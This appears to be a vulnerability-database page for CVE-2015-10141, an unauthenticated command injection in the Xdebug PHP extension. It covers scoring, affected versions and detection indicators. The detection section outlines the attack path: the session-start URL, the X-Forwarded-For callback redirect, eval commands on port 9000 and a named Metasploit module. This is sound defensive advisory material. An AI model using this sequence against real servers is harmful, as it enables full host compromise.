cbcvebase.
CVE-2015-10141
published 2025-07-23

CVE-2015-10141: An unauthenticated OS command injection vulnerability exists within Xdebug versions 2.5.5 and earlier, a PHP debugging extension developed by Derick Rethans…

PriorityP181critical9.3CVSS 4.0
AVNACLATNPRNUINVCHVIHVAHSCNSINSANEXCRXIRXARXMAVXMACXMATXMPRXMUIXMVCXMVIXMVAXMSCXMSIXMSAXSXAUXRXVXREXUX
EXPLOIT
EPSS
5.03%
91.2th percentile
An unauthenticated OS command injection vulnerability exists within Xdebug versions 2.5.5 and earlier, a PHP debugging extension developed by Derick Rethans. When remote debugging is enabled, Xdebug listens on port 9000 and accepts debugger protocol commands without authentication. An attacker can send a crafted eval command over this interface to execute arbitrary PHP code, which may invoke system-level functions such as system() or passthru(). This results in full compromise of the host under the privileges of the web server user.

Affected

2 ranges
VendorProductVersion rangeFixed in
debianxdebug
xdebugxdebug<= 2.5.5

Detection & IOCsextracted from sources · hover to see the quote

port9000
cookieXDEBUG_SESSION
url/?XDEBUG_SESSION_START={{randstr}}
commandeval
  • Monitor for inbound TCP connections to port 9000 from external/untrusted sources, which may indicate exploitation of the unauthenticated Xdebug remote debugger interface.
  • Detect HTTP requests containing the query parameter XDEBUG_SESSION_START, which is used to initiate an Xdebug remote debugging session and is the first step of exploitation.
  • Detect HTTP responses setting the XDEBUG_SESSION cookie, confirming the target has Xdebug remote debugging enabled and is susceptible to exploitation.
  • Alert on the presence of the X-Forwarded-For header being set to an attacker-controlled callback URL in conjunction with XDEBUG_SESSION_START requests, as this is used to redirect the debugger connection to the attacker.
  • Look for debugger protocol eval commands sent over port 9000 that invoke PHP system-level functions, indicating active code execution attempts.
  • Use the Metasploit module unix/http/xdebug_unauth_exec to validate exposure; its presence in logs or IDS signatures can indicate active exploitation attempts.
  • ·Exploitation requires Xdebug remote debugging to be explicitly enabled; this is not a default configuration in production environments.
  • ·All Red Hat offerings ship fixed or unaffected versions of Xdebug and do not enable remote debugging by default, reducing real-world risk in those environments.
  • ·Debian distributions (bookworm, bullseye, forky, sid, trixie) remain open/unpatched for this CVE as of the tracker data; deployments on these distros should be treated as potentially vulnerable if Xdebug <= 2.5.5 is installed.

CVSS provenance

nvdv4.09.3CRITICALCVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
osv9.3CRITICAL
vendor_debian9.3LOW
vendor_redhat9.3CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.